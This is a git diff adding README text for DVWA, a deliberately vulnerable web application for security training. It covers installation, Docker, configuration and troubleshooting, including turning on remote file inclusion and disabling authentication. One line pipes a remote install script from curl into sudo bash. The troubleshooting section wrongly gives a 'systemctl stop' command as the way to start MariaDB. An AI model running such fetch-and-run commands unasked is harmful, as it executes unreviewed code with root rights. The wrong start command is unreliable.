+Server database tidak berjalan. Pada distribusi berbasis Debian, ini dapat dilakukan dengan perintah: +```sh +sudo service mysql start +``` + +### Errors "MySQL server has gone away" and "Packets out of order" + +Ada beberapa alasan mengapa Anda bisa mendapatkan kesalahan ini, tetapi yang paling mungkin adalah versi server basis data yang Anda jalankan tidak kompatibel dengan versi PHP. + +Ini biasanya terjadi ketika Anda menjalankan versi terbaru MySQL yang tidak selaras dengan PHP. Saran terbaik, ganti MySQL dengan menginstal MariaDB, karena ini bukan sesuatu yang dapat kami dukung. + +Untuk informasi lebih lanjut, lihat: + + + +### Perintah Injection tidak bekerja + +Apache mungkin tidak memiliki hak istimewa yang cukup untuk menjalankan perintah pada server web. Jika Anda menjalankan DVWA di bawah Linux, pastikan Anda masuk sebagai root. Di bawah Windows, masuk sebagai Administrator. + +### Database tidak terhubung pada CentOS? + +Anda mungkin mengalami masalah dengan SELinux. Matikan SELinux atau jalankan perintah berikut untuk mengizinkan web server berkomunikasi dengan basis data: +``` +setsebool -P httpd_can_network_connect_db 1 +``` + +### Yang lainnya + +Untuk informasi pemecahan masalah terbaru, harap baca masalah terbuka dan yang sudah ditutup di repositori Git: + + + +Sebelum mengajukan tiket, pastikan Anda menjalankan versi terbaru kode dari repositori. Ini bukan versi terbaru yang dirilis, tetapi kode terbaru dari cabang master. + +Jika Anda mengajukan tiket, harap kirimkan setidaknya informasi berikut: + +- Sistem Operasi +- 5 baris terakhir dari log kesalahan server web segera setelah kesalahan yang Anda laporkan terjadi +- Jika ini adalah masalah otentikasi basis data, ikuti langkah-langkah di atas dan tangkap layar setiap langkah. Kirimkan ini bersama dengan tangkapan layar bagian file konfigurasi yang menunjukkan pengguna dan kata sandi basis data. +- Deskripsi lengkap tentang apa yang salah, apa yang Anda harapkan terjadi, dan apa yang sudah Anda coba lakukan untuk memperbaikinya. "login broken" tidak cukup bagi kami untuk memahami masalah Anda dan membantu memperbaikinya. + +- - - + +### Panduan + +Saya akan mencoba membuat beberapa video tutorial yang menguraikan beberapa kerentanan dan menunjukkan cara mendeteksinya, dan kemudian bagaimana cara mengeksploitasi mereka. Berikut adalah yang sudah saya buat sejauh ini: + +[Finding and Exploiting Reflected XSS](https://youtu.be/V4MATqtdxss) + +- - - + +## SQLite3 SQL Injection + +Dukungan untuk ini terbatas, sebelum mengajukan masalah, pastikan Anda siap untuk melakukan debug, jangan hanya mengklaim "tidak berfungsi". + +Secara default, SQLi dan Blind SQLi dilakukan terhadap server MariaDB/MySQL yang digunakan oleh situs, tetapi memungkinkan untuk beralih untuk melakukan pengujian SQLi terhadap SQLite3. + +Saya tidak akan membahas cara menggunakan SQLite3 dengan PHP, tetapi seharusnya cukup mudah dengan menginstal paket `php-sqlite3` dan memastikan bahwa paket tersebut diaktifkan. + +Untuk beralih, cukup edit file konfigurasi dan tambahkan atau edit baris-baris berikut: +``` +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +Secara default, program ini menggunakan file `database/sqli.db`. Jika Anda mengalami kesalahan, cukup salin file `database/sqli.db.dist` di atasnya. + +Tantangannya sama persis seperti untuk MySQL, hanya saja dijalankan dengan menggunakan SQLite3. + +- - - + +👨‍đŸ’ģ Kontributor +----- + +Terima kasih atas semua kontribusi Anda dan menjaga proyek ini tetap terkini. :heart: + +Jika Anda memiliki ide, jenis perbaikan, atau hanya ingin berkolaborasi, Anda dipersilakan untuk berkontribusi dan berpartisipasi dalam Proyek ini. Jangan ragu untuk mengirimkan permintaan tautan (PR) Anda. +

+ + + +

+ +- - - + +## Tautan + +Beranda Proyek: + +*Dibuat oleh tim DVWA* diff --git a/DVWA/README.it.md b/DVWA/README.it.md new file mode 100644 index 00000000..c4d01269 --- /dev/null +++ b/DVWA/README.it.md @@ -0,0 +1,747 @@ +# DAMN VULNERABLE WEB APPLICATION + +Damn Vulnerable Web Application (DVWA) è un'applicazione web PHP/MariaDB che è dannatamente vulnerabile. Il suo principale obiettivo è: essere d'aiuto a professionisti di sicurezza informatica per testare le loro skill e i loro strumenti in un ambiente legale,aiutare i web developers a mettere in sicurezza le web applications e aiutare sia studenti che docenti a capire la sicurezza delle web applications in un'ambiente controllato. + +L'obiettivo di DVWA è **praticare alcune tra le piÚ comuni vulnerabilità web** con **vari livelli di difficoltà**e con una semplice e diretta interfaccia. È opportuno notare che sono presenti sia **vulnerabilità documentate e non documentate** con questo software. Questo è stato fatto intenzionalmente. Si è pregati di provare a scoprire piÚ vulnerabilità possibili. +- - - + +## ATTENZIONE! + +Damn Vulnerable Web Application è dannatamente vulnerabile! **Non caricarla nella cartella contentente i file html del tuo provider di hosting nÊ su alcun server accessibile da Internet** perchÊ saranno compromessi. È raccomandato utilizzare una macchina virtuale (ad esempio [VirtualBox](https://www.virtualbox.org/) oppure [VMware](https://www.vmware.com/)), che sia settata su NAT modalità networking. Dentro una macchina guest, bisogna scaricare ed installare [XAMPP](https://www.apachefriends.org/) per il server web ed il database. + +### Disclaimer + +Non ci assumiamo la responsabilità del modo in cui verrà utilizzata questa applicazione (DVWA). L'obiettivo di questa applicazione è stato dichiarato in modo chiaro e non dovrebbe essere usata per altri scopi. Abbiamo avvisato e dato misure di sicurezza per fare in modo che gli utenti non installino DVWA nei loro live web servers. Se il tuo live web server è compromesso da un'installazione di DVWA, non è nostra responsabilità, è responsabilità della persona che ha caricato e installato il software. + +--- + +## Licensa + +Questo file è parte di Damn Vulnerable Web Application (DVWA). + +Vulnerable Web Application (DVWA). è un software libero: +si puÃ˛ ridistribuire e/o modificarlo sotto i termini del GNU General Public LIcense come pubblicato dalla Free Software Foundation, sia la versione 3 della licensa o qualsiasi versione posteriore. + +Damn Vulnerable Web Application (DVWA) è distribuito nella speranza che sarà utile, ma senza ALCUNA GARANZIA; neppure la garanzia implicita di COMMERCIABILITÀ o IDONEITÀ PER UNO SCOPO PARTICOLARE. Vedi la GNU General Public License per ulteriori dettagli. + +È necessario avere una copia del GNU General Public License assieme a Damn Vulnerable Web Application (DVWA). Altrimenti, vedere . + +- - - + +## Internazionalizzazione + +Questo file è disponibile in diverse lingue: + +- Arabo: [اŲ„ØšØąØ¨ŲŠØŠ](README.ar.md) +- Cinese: [įŽ€äŊ“中文](README.zh.md) +- Francese: [Français](README.fr.md) +- Coreano: [한ęĩ­ė–´](README.ko.md) +- Persiano: [ŲØ§ØąØŗی](README.fa.md) +- Polacco: [Polski](README.pl.md) +- Portoghese: [PortuguÃĒs](README.pt.md) +- Spagnolo: [EspaÃąol](README.es.md) +- Turco: [TÃŧrkçe](README.tr.md) +- Indonesiano: [Indonesia](README.id.md) +- Vietnamita: [Vietnamese](README.vi.md) +- Italiano: [Italiano](README.it.md) + +Se si desidera contribuire ad una traduzione, si invii per favore una PR. Nota perÃ˛: questo non significa semplicemente passare il testo su Google Translate e inviarlo, tali traduzioni verranno rifiutate. Invia la tua versione tradotta aggiungendo un nuovo file chiamato README.xx.md, dove xx è il codice a due lettere della lingua desiderata (basato sullo standard ISO 639-1). + +- - - + +## Download + +Anche se ci sono varie versione di DVWA in circolazione, l'unica supportata è l'ultima dal repository ufficiale di GitHub. Si puÃ˛ sia clonare dal repo: + +```sh +git clone https://github.com/digininja/DVWA.git +``` + +O [scaricare un ZIP dei file](https://github.com/digininja/DVWA/archive/master.zip). + +- - - + +## Installazione + +### Installazione Automatica 🛠ī¸ +**Nota, questo non è uno script ufficiale di DVWA, è stato scritto da [IamCarron](https://github.com/iamCarron/). Creare questo script è costato molto lavoro e, quando è stato creato, era sicuro, tuttavia è consigliato leggere lo script prima di eseguirlo alla cieca, per sicurezza. Per favore segnalare qualsiasi bug a [IamCarron](https://github.com/iamCarron/), non qui.** + +Uno script di configurazione automatica per DVWA su macchine basate su Debian, inclusa Kali, Ubunut, Kubuntu, Linux Mint, Zorin OS... + +**Nota: Questo script richiede i permessi di root ed è pensato per sistemi basati su Debian. È necessario assicurarsi che si è utente root.** + +#### Requisiti per l'installazione + +- **Sistema operativo:** Sistemi basati su Debian (Kali, Ubuntu, Kubuntu, Linux Mint, Zorin Os) +- **Privilegi-** Eseguire come utente root + +#### Step dell'installazione + +##### One-Liner + +Questo comando scarica lo script scritto da [@IamCarron](https://github.com/iamCarron/) e lo esegue automaticamente. Questo non sarebbe incluso qui se non avessimo fiducia nell'autore e nello script cosÃŦ com'era al momento della revisione, ma esiste sempre la possibilità che qualcuno agisca in modo malevolo. Pertanto, se non ti senti al sicuro nell'eseguire codice di terzi senza prima esaminarlo personalmente, segui la procedura manuale e potrai rivedere lo script una volta scaricato. + +```sh +sudo bash -c "$(curl --fail --show-error --silent --location https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh)" +``` + +##### Esecuzione manuale dello Script + +1. **##Scarica lo script:** + + ```sh + wget https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh + ``` + +2. **Rendi lo script eseguibile:** + + ```sh + chmod +x Install-DVWA.sh + ``` + +3. **Esegui lo script come utente root:** + + ```sh + sudo ./Install-DVWA.sh + ``` + +### Video di installazione + +- [Installa DVWA su Kali utilizzando Virtualbox](https://www.youtube.com/watch?v=WkyDxNJkgQ4) +- [Installa DVWA su Windows utilizzando XAMPP](https://youtu.be/Yzksa_WjnY0) +- [Installa Damn Vulnerable Web Application (DVWA) on Windows 10](https://www.youtube.com/watch?v=cak2lQvBRAo) + +### Windows + XAMPP + +Il modo piÚ semplice per installare DVWA è scaricare ed installare [XAMPP](https://www.apachefriends.org/) qualora già non si abbia un setup di un Web Server. + +XAMPP è una distribuzione Apache per Linux, Solaris, Window e MAC OS X molto semplice da installare. I pacchetti includono il web server Apache, MYSQL, PHP Perl, un server FTP e phpMyAdmin. + +Questo [video](https://youtu.be/Yzksa_WjnY0) mostra gli step per l'installazione per Windows. Tuttavia dovrebbe essere simile per altri sistemi operativi. + +### Docker + +Grazie a [hoang-himself](https://github.com/hoang-himself) e [JGillam](https://github.com/JGillam), ogni commit al `master` branch fa in modo che un'immagine Docker sia buildata per ogni branch e sia pronta da essere pullata dal GitHub Container Registry. + +Per piÚ informazioni, si visiti [le Immagini Docker prebuildate](https://github.com/digininja/DVWA/pkgs/container/dvwa). + +#### Per iniziare + +Prerequisiti: Docker e Docker Compose. + +- Se si usa Docker Desktop, entrambi i requisiti dovrebbero essere già installati. +- Se si preferisce l'utilizzo di Docker Engine su Linux, è importante seguire correttamente la [guida d'installazione](https://docs.docker.com/engine/install/#server). + +**Forniamo assistenza per l'ultima versione di Docker come discusso sopra.** + +Se stai usando Linux e il pacchetto Docker fornito dal tuo gestore di pacchetti, probabilmente funzionerà comunque, ma il supporto sarà fornito solo best-effort. + +Aggiornare Docker dalla versione del gestore pacchetti a quella ufficiale ("upstream") richiede la disinstallazione delle vecchie versioni, come indicato nella documentazione per [Ubuntu](https://docs.docker.com/engine/install/ubuntu/#uninstall-old-versions), [Fedora](https://docs.docker.com/engine/install/fedora/#uninstall-old-versions) e altre distribuzioni. + +I tuoi dati Docker (container, immagini, volumi, ecc.) non dovrebbero essere influenzati, ma nel caso si presentino problemi, assicurati di segnalarli a [Docker](https://www.docker.com/support) e nel frattempo utilizza i motori di ricerca. + +Poi, per iniziare: + +1. Esegui `docker version` and `docker compose version` per verificare di avere correttamente installati Docker e Docker Compose. Si dovrebbe essere in grado di vedere le versioni dei pacchetti in output. + + Per esempio: + + ```text + >>> docker version + Client: + [...] + Version: 23.0.5 + [...] + + Server: Docker Desktop 4.19.0 (106363) + Engine: + [...] + Version: 23.0.5 + [...] + + >>> docker compose version + Docker Compose version v2.17.3 + ``` + + Se non si vede nulla oppure si ha un "errore: comando non trovato", seguire i prerequisiti per fare il setup di Docker e Docker Compose. + +2. Clonare e scaricare questo repository ed estrarre (vedere [Download](#download)). +3. Aprire un terminale di tua scelta e cambiare la cartella di lavoro in questa cartella (`DVWA`). +3. Eseguire `docker compose up -d`. + +DVWA è ora disponibile all'indirizzo `http://localhost:4280`. + + +**Nota che per eseguire DVWA nei container, il web server è in ascolto sulla porta 4280 invece che la solita porta 80.** +Per piÚ informazioni su questa decisione, vedere [Voglio eseguire DVWA su una porta differente](#Voglio-eseguire-DVWA-su-una-porta-differente) + +#### Build locale + +Se si sono fatti cambiamente e si vuole buildare il progetto da locale, andare a `compose.yml` e cambiare `pull_policy: always` in `pull_policy: build`. + +Eseguire `docker compose up -d` dovrebbe spingere Docker a buildare un'immagine da locale indipendentemente da ciÃ˛ che è disponibile nel registro. + +See also: [`pull_policy`](https://github.com/compose-spec/compose-spec/blob/master/05-services.md#pull_policy). + +#### Serve local files + +Se si stanno facendo cambiamenti in locale e non si vuole effettuare una build per ogni cambiamente: +1. Andare a `compose.yml` e rimuovare il commento da : + ``` + # volumes: + # - ./:/var/www/html + ``` +2. Eseguire `cp config/config.inc.php.dist config/config.inc.php` per copiare il file di configurazione di default. +3. Eseguire `docker compose up -d` e i cambiamenti sui file locale si rifletteranno sul container. + +### Versioni PHP + +Idealmente, dovresti utilizzare l'ultima versione stabile di PHP, poichÊ è su quella versione che questa applicazione verrà sviluppata e testata. + +Non verrà fornito supporto a chi tenta di utilizzare PHP 5.x. + +Le versioni inferiori alla 7.3 presentano problemi noti che possono causare malfunzionamenti: gran parte dell'app funzionerà, ma alcune funzionalità potrebbero comportarsi in modo imprevedibile. A meno che tu non abbia un motivo davvero valido per utilizzare una versione cosÃŦ obsoleta, il supporto non sarà garantito. + +### Pacchetti Linux + +Se stai usando una distribuzione Linux basata su Debian, saranno necessari i seguenti pacchetti _(o loro equivalenti)_: + +- apache2 +- libapache2-mod-php +- mariadb-server +- mariadb-client +- php php-mysqli +- php-gd + +Raccomanderei di fare un update prima di scaricarli, in modo tale da avere sicuramente l'ultima versione di tutto. + +```sh +apt update +apt install -y apache2 mariadb-server mariadb-client php php-mysqli php-gd libapache2-mod-php +``` + +Il sito funzionerà con MySQL invece di MariaDB ma incoraggiamo vivamente MariaDB poichÊ funziona out of the box. Con MYSQL è necessario fare dei cambiamenti affinchÊ funzioni. + +### Moduli Apache + +Se si vuole usare il lab API è necessario avere il modulo Apache `mod_rewrite` abilitato. Per fare questo in linux eseguire: + +``` +a2enmod rewrite +``` + +Poi riavviare Apache con: + +``` +apachectl restart +``` + +### File sellers + +Se si vuole usare il modulo API sarà necessario scaricare un insieme di file sellers usando [Composer](https://getcomposer.org/). + +In primo luogo, assicurarsi di avere Composer installato. Sembrano esserci problemi di incompatibilità tra le versioni. Io ottengo le versioni piÚ recenti da qui: + +https://getcomposer.org/doc/00-intro.md + +Seguire le istruzioni del sito per installare Composer. + +Poi andare dentro la cartella `vulnerabilities/api` ed eseguire: + +``` +composer.phar install +``` + +Se non si è scaricato Composer nella cartella di sistema, assicurarsi di avere come riferimento il percorso completo. + +## Configurations + +### Config File + +DVWA viene fornito con una copia fittizia del suo file di configurazione, che dovrai copiare nella posizione corretta e poi modificare opportunamente. Su Linux, assumendo che tu sia nella directory di DVWA, questo puÃ˛ essere fatto come segue: + + +`cp config/config.inc.php.dist config/config.inc.php` + +Su Windows, questo puÃ˛ essere un po’ piÚ complicato se le estensioni dei file sono nascoste. Se non si è sicuri di questo aspetto, questo articolo del blog lo spiega piÚ nel dettaglio: + +[Come mostrare l'estensione dei file su Windows](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/) + +### Configurazione con variabili di ambiente + +Invece di modificare il file di configurazione, puoi anche impostare la maggior parte delle opzioni utilizzando delle variabili d'ambiente. In un deployment Docker o Kubernetes, questo ti permette di modificare la configurazione senza dover creare una nuova immagine Docker. Troverai le variabili nel [config/config.inc.php.dist](config/config.inc.php.dist) file. + +Se si desidera impostare il livello di sicurezza su "basso", aggiungere semplicemente la seguente linea al file [compose.yml](./compose.yml): + +```yml +environment: + - DB_SERVER=db + - DEFAULT_SECURITY_LEVEL=low +``` + +### Setup Del Database + +Per fare il setup del database, semplicemente cliccare sul bottone `Setup DVWA` nel menu principale, poi cliccare il bottone `Create / Reset Database`. Questo creerà / resetterà il database per te con un po' di dati al suo interno. + +Qualora si riceva un errore durante la creazione del database, assicurarsi di aver inserito delle credenziali corrette dentro `./config/config.inc.php`. _Questo è diverso da config.inc.php.dist, è solo un file di esempio._ + +Le variabili sono settate ai seguenti valori di default: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; +$_DVWA[ 'db_port'] = '3306'; +$_DVWA[ 'db_user' ] = 'dvwa'; +$_DVWA[ 'db_password' ] = 'p@ssw0rd'; +$_DVWA[ 'db_database' ] = 'dvwa'; +``` + +Nota, se si sta usando MariaDB invece di MySQL (MariaDB è il default in Kali), non si puÃ˛ usare l'utente root del database, bisogna creare un nuovo utente del database. Per fare questo, connettersi al database come utente root e usare i seguenti comandi: + +```mariadb +MariaDB [(none)]> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +MariaDB [(none)]> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +MariaDB [(none)]> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 sec) + +MariaDB [(none)]> flush privileges; +Query OK, 0 rows affected (0.00 sec) +``` + +### Disabilitare L'Autenticazione +Alcuni strumenti non funzionano bene con l'autenticazione quindi non possono essere usati con DVWA. Per risolvere questo, c'è un'impostazione di configurazione per disabilitare il controllo dell'autenticazione. Per farlo, bisogna semplicemente settare il seguente flag nel file di configurazione + +```php +$_DVWA[ 'disable_authentication' ] = true; +``` +Sarà anche necessario impostare il livello di sicurezza su uno che sia appropriato sul livello di test che si vuole fare: + +```php +$_DVWA[ 'default_security_level' ] = 'low'; +``` + +In questo caso, si puÃ˛ accedere a tutte le features senza il bisogno di essere loggati o senza alcun cookie. + +### Cartella Permessi + +- `./hackable/uploads/` - È necessario che sia scrivibile dal Web Service (per il File Upload). + +### Configurazione PHP + +Sui sistemi Linux, probabilmente si trova in `/etc/php/x.x/fpm/php.ini` o `/etc/php/x.x/apache2/php.ini`. + +- Per abilitare il Remote File Inclusions (RFI): + - `allow_url_include = on` [[allow_url_include](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-include)] + - `allow_url_fopen = on` [[allow_url_fopen](https://secure.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen)] + +- Per essere sicuri che PHP mostri tutti i messaggi di errore: + - `display_errors = on` [[display_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)] + - `display_startup_errors = on` [[display_startup_errors](https://secure.php.net/manual/en/errorfunc.configuration.php#ini.display-startup-errors)] + +È necessario riavviare il servizio php o Apache dopo aver effettuato i cambiamenti. + +### reCAPTCHA + +È necessario eseguire quanto riportato qui sotto solo per il laboratorio "CAPTCHA insicuro", se non si vuole usare con quel laboratorio, si puÃ˛ ignorare questo capitolo. + +Generare un paio di chiavi da . + +Poi andare nelle seguenti sezioni di `./config/config.inc.php`: + +- `$_DVWA[ 'recaptcha_public_key' ]` +- `$_DVWA[ 'recaptcha_private_key' ]` + +### Credenziali Di Default + +**Default username = `admin`** + +**Default password = `password`** + +_...puÃ˛ essere bruteforzato facilmente ;)_ + +URL DI LOGIN: + +_Nota: Questo sarà differente se si è installato DVWA in una cartella differente._ + +- - - + +## Risoluzione Di Problemi + +Si presume che si stia utilizzando una distribuzione basata su Debian, come Debian, Ubuntu o Kali. Per altre distribuzioni, si puÃ˛ comunque seguire la guida, aggiornando i comandi dove opportuno. + +Se si preferisce guardare un video anzichÊ leggere, i problemi piÚ comuni vengono trattati nel video [Fixing DVWA Setup Issues](https://youtu.be/C-kig5qrPSA?si=_a4Bop505-1tXb_F). + +### Containers + +#### Vorrei accedere i log + +Se si sta usando Docker Desktop, i log possono essere acceduti dall'applicazione grafica. Alcuni cambiamenti minori ci possono essere nelle versioni piÚ recenti ma il metodo di accesso dovrebbe essere il medesimo. + +![Overview of DVWA compose](./docs/graphics/docker/overview.png) +![Viewing DVWA logs](docs/graphics/docker/detail.png) + +I log possono essere anche acceduti dal terminale. + +1. Aprire un terminale e cambiare la cartella di lavoro di DVWA. +2. Mostrare i log uniti + + ```sh + docker compose logs + ``` + + In caso si vogliano esportare i log, i.e. `dvwa.log` + + ```sh + docker compose logs > dvwa.log + ``` + +#### Voglio eseguire DVWA in un'altra porta + +Non si utilizza la porta 80 come predefinita per alcuni motivi: + +- Alcuni utenti potrebbero avere già qualcosa in esecuzione sulla porta 80. +- Alcuni utenti potrebbero usare un container senza privilegi (come Podman), e la porta 80 è una porta privilegiata (< 1024). Sarebbe necessaria una configurazione aggiuntiva (ad esempio impostare `net.ipv4.ip_unprivileged_port_start`) è necessario, ma su questo bisognerà informarsi autonomamente. + +Si puÃ˛ esporre DVWA su una porta diversa modificando l'associazione della porta nel file `compose.yml`. +Per esempio, si puÃ˛ cambiare + +```yml +ports: + - 127.0.0.1:4280:80 +``` + +in + +```yml +ports: + - 127.0.0.1:8806:80 +``` + +DVWA è ora accessibile a `http://localhost:8806`. + +Nei casi in cui si desideri che DVWA sia accessibile non solo dal proprio dispositivo, ma anche dalla rete locale (ad esempio perchÊ si sta configurando una macchina di test per un workshop), si puÃ˛ rimuovere il `127.0.0.1:` dall’associazione delle porte (oppure sostituirlo con l’indirizzo IP della propria LAN). In questo modo, l'applicazione ascolterà su tutte le interfacce di rete disponibili. + +La scelta predefinita e piÚ sicura dovrebbe comunque essere quella di limitare l’ascolto al solo dispositivo locale (loopback). In fin dei conti, si tratta di un'applicazione web deliberatamente vulnerabile, in esecuzione sulla propria macchina. + +437 + +Il file incluso [`compose.yml`](./compose.yml) esegue automaticamente DVWA e il suo database quando Docker viene inizializzato. + +Per disabilitare questa funzione, si puÃ˛ eliminare o commentare la linea `restart: unless-stopped` nel file [`compose.yml`](./compose.yml) + +Se si vuole disabilitare questo comportamento temporaneamente, si puÃ˛ eseguire `docker compose stop`, o usare Docker Desktop, trovare `dvwa` e cliccare Stop. +Addizionalmente, si possono eliminare i container oppure eseguire `docker compose down`. + +### File di log + +Sui sistemi Linux Apache genera due file di log di default, `access.log` e `error.log` e sui sistemi Debian sono solitamente nella cartella `/var/log/apache2/`. + +Durante la segnalazione di errori, problemi o qualsiasi cosa del genere, per favore includere almeno cinque linee da ognuno di questi file. Sui sistemi basati su Debian si possono ottenere questi file cosÃŦ + +```sh +tail -n 5 /var/log/apache2/access.log /var/log/apache2/error.log +``` + +### Navigando sul sito ho ottenuto un errore 404 o la pagina predefinita di Apache2 + +[Video di aiuto](https://youtu.be/C-kig5qrPSA?si=wTS3Aj8fycW3Idfr&t=141) + +Se si sta avendo questo problema bisogna capire come funziona la posizione dei file. Di default, la root dei documenti di Apache (il posto in cui comincia a cercare i documenti) è `/var/www/html`, Se si posiziona il file `hello.txt` in questa cartella, per accedere questo file sarà necessario navigare a `http://localhost/hello.txt`. + +Se si è creata una cartella e messi i file lÃŦ dentro - `/var/www/html/mydir/hello.txt` - si avrà bisogno di navigare a `http://localhost/mydir/hello.txt`. + +Linux è attento alle maiuscole e minuscole, se non si fa attenzione si puÃ˛ ottenere un errore `404 Not Found`: + +- `http://localhost/MyDir/hello.txt` +- `http://localhost/mydir/Hello.txt` +- `http://localhost/MYDIR/hello.txt` + +Che effetto ha questo su DVWA? Diverse persone usano git per clonare DVWA in `/var/www/html`, questo crea la cartella `/var/www/html/DVWA/` con tutti i file al suo interno. Successivamente navigano `http://localhost/` e ottengono o `404` o la pagina predefinita di Apache. PoichÊ i file sono in DVWA bisogna navigare in `http://localhost/DVWA`. + +L'altro errore comune è quello di navigare su `http://localhost/dvwa`, il che porta a un errore `404` perchÊ `dvwa` non è `DVWA`, dato che in Linux si fa distinzione tra maiuscole e minuscole nei nomi delle directory. + +Quindi, dopo l'installazione, se si prova a visitare il sito e si riceve un errore `404`, si deve riflettere su dove sono stati installati i file, su dove si trovano rispetto alla radice del documento e su come siano scritte le lettere della directory usata. + +### Navigando la pagina ho ottenuto uno schermo vuoto + +[Video d'aiuto](https://youtu.be/C-kig5qrPSA?si=wTS3Aj8fycW3Idfr&t=243) + +Questo è di solito un problema di configurazione che ne nasconde un altro. Di default, PHP non mostra gli errori, e quindi, se ci si è dimenticati di attivare la visualizzazione degli errori durante il processo di configurazione, qualsiasi altro problema, come un fallimento nella connessione al database, impedirà all'applicazione di caricarsi, ma il messaggio che dice cosa non va sarà nascosto. + +Per sistemare questo, bisogna essere sicuri di impostare `display_errors` e `display_startup_errors` come discusso in [Configurazione di PHP](#configurazione-php) e poi riavviare Apache. + +### "Access denied" mentre si esegue il setup + +Se si vede quanto segue durante l'esecuzione dello script di configurazione, significa che il nome utente o la password nel file di configurazione non corrispondono a quelli configurati nel database. +[Video d'aiuto](https://youtu.be/C-kig5qrPSA?si=_a4Bop505-1tXb_F&t=973) + +```mariadb +Database Error #1045: Access denied for user 'notdvwa'@'localhost' (using password: YES). +``` + +L'errore sta dicendo che si sta usando lo username `notdvwa`. + +Il seguente errore dice che si è scritto il file di configurazione al database sbagliato. [Video d'aiuto](https://youtu.be/C-kig5qrPSA?si=_a4Bop505-1tXb_F&t=630) + +```mariadb +SQL: Access denied for user 'dvwa'@'localhost' to database 'notdvwa' +``` + +Questo errore sta invece dicendo che l'utente `dvwa` sta provando a connettersi al database `notdvwa`. + +La prima cosa da fare è ricontrollare che ciÃ˛ che si pensa di aver inserito nel file di configurazione sia effettivamente quello che è presente. + +Se corrisponde a quanto ci si aspetta, la cosa successiva da fare è verificare se si riesce ad accedere come l’utente voluto da linea di comando. Supponendo di avere un utente del database chiamato `dvwa` e una password di `p@ssw0rd`, eseguire il seguente comando: + +```sh +mysql -u dvwa -pp@ssw0rd -D dvwa +``` + +_Nota: non c'è uno spazio dopo -p_ + +Se si vede il seguente output, il codice è corretto: + +```mariadb +Welcome to the MariaDB monitor. Commands end with ; or \g. +Your MariaDB connection id is 14 +Server version: 10.3.22-MariaDB-0ubuntu0.19.10.1 Ubuntu 19.10 + +Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +MariaDB [dvwa]> +``` + + + +PoichÊ si riesce a connettersi dalla riga di comando, è probabile che ci sia qualcosa di sbagliato nel file di configurazione, lo si ricontrolli attentamente e poi si apra un issue se ancora non si riesce a far funzionare le cose. + +Se si vede quanto segue, il nome utente o la password che si sta usando è sbagliato. Si ripetano i passaggi della [Database Setup](#database-setup) e ci si assicuri di usare lo stesso nome utente e la stessa password per tutto il processo. + +```mariadb +ERROR 1045 (28000): Access denied for user 'dvwa'@'localhost' (using password: YES) +``` + +Se si ottiene quanto segue, le credenziali dell'utente sono corrette ma l'utente non ha accesso al database. Anche in questo caso, si ripetano i passaggi di configurazione e si controlli il nome del database che si sta usando. + +```mariadb +ERROR 1044 (42000): Access denied for user 'dvwa'@'localhost' to database 'dvwa' +``` + +L'errore finale che si potrebbe ottenere è questo: + +```mariadb +ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) +``` + +Questo non è un errore di autenticazione ma dice che il server del database non è in esecuzione. Si puÃ˛ avviarlo con il seguente comando. + +```sh +sudo service mysql start +``` + +### Connessione rifiutata + +[Video d'aiuto](https://youtu.be/C-kig5qrPSA?si=_a4Bop505-1tXb_F&t=444) + +Un errore simile a questo: + +```mariadb +Fatal error: Uncaught mysqli_sql_exception: Connection refused in /var/sites/dvwa/non-secure/htdocs/dvwa/includes/dvwaPage.inc.php:535 +``` + +Significa che il server del database non è in esecuzione oppure si ha l'indirizzo ip errato nel file di configurazione. + +Controllare questa linea nel file di configurazione per vedere dove il server del database dovrebbe essere: + +```php +$_DVWA[ 'db_server' ] = '127.0.0.1'; +``` + +Poi andare a questo server e controllare che sia in esecuzione. In linux si puÃ˛ fare questo con: + +```sh +systemctl status mariadb.service +``` + +E si deve cercare qualcosa del genere, la cosa importante è che dica qualcosa come `active (running)`. + +```sh +● mariadb.service - MariaDB 10.5.19 database server + Loaded: loaded (/lib/systemd/system/mariadb.service; enabled; preset: enabled) + Active: active (running) since Thu 2024-03-14 16:04:25 GMT; 1 week 5 days ago +``` + +Se non è in esecuzione, si puÃ˛ avviare con: + +```sh +sudo systemctl stop mariadb.service +``` + +Nota `sudo` e assicurarsi di mettere la password di Linux se richiesto. + +In Windows, controllare lo status nella console XAMPP. + +### Metodo Di Autenticazione Sconosciuto + +Con le versioni piÚ recenti di MySQL, non è piÚ possibile far comunicare PHP con il database nella sua configurazione predefinita. Se si prova a eseguire lo script di installazione e viene visualizzato il seguente messaggio, significa che è stata configurata una configurazione. + + +```mariadb +Database Error #2054: The server requested authentication method unknown to the client. +``` + +Si hanno due opzioni, la piÚ semplice è disinstallare MySQL e installare MariaDB. La seguente è la guida ufficiale dal progetto di MariaDB: + + + +Alternativamente, seguire questi passi: + +1. Da utente root, modificare il seguente file: `/etc/mysql/mysql.conf.d/mysqld.cnf` +1. Sotto la linea `[mysqld]`, aggiungere: + `default-authentication-plugin=mysql_native_password` +1. Riavviare il database: `sudo service mysql restart` +1. Controllare il metodo di autenticazione per l'utente del database: + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + +-----------+------------------+-----------------------+ + | Host | User | plugin | + +-----------+------------------+-----------------------+ + | localhost | dvwa | caching_sha2_password | + +-----------+------------------+-----------------------+ + 1 rows in set (0.00 sec) + ``` +1. Si vedrà verosimilmente `caching_sha2_password`. Se sÃŦ, eseguire eseguire i seguenti comandi: + + ```sql + mysql> ALTER USER dvwa@localhost IDENTIFIED WITH mysql_native_password BY 'p@ssw0rd'; + ``` + +1. Ri-eseguendo i controlli, si dovrebbe ora vedere +`mysql_native_password`. + + ```sql + mysql> select Host,User, plugin from mysql.user where mysql.user.User = 'dvwa'; + 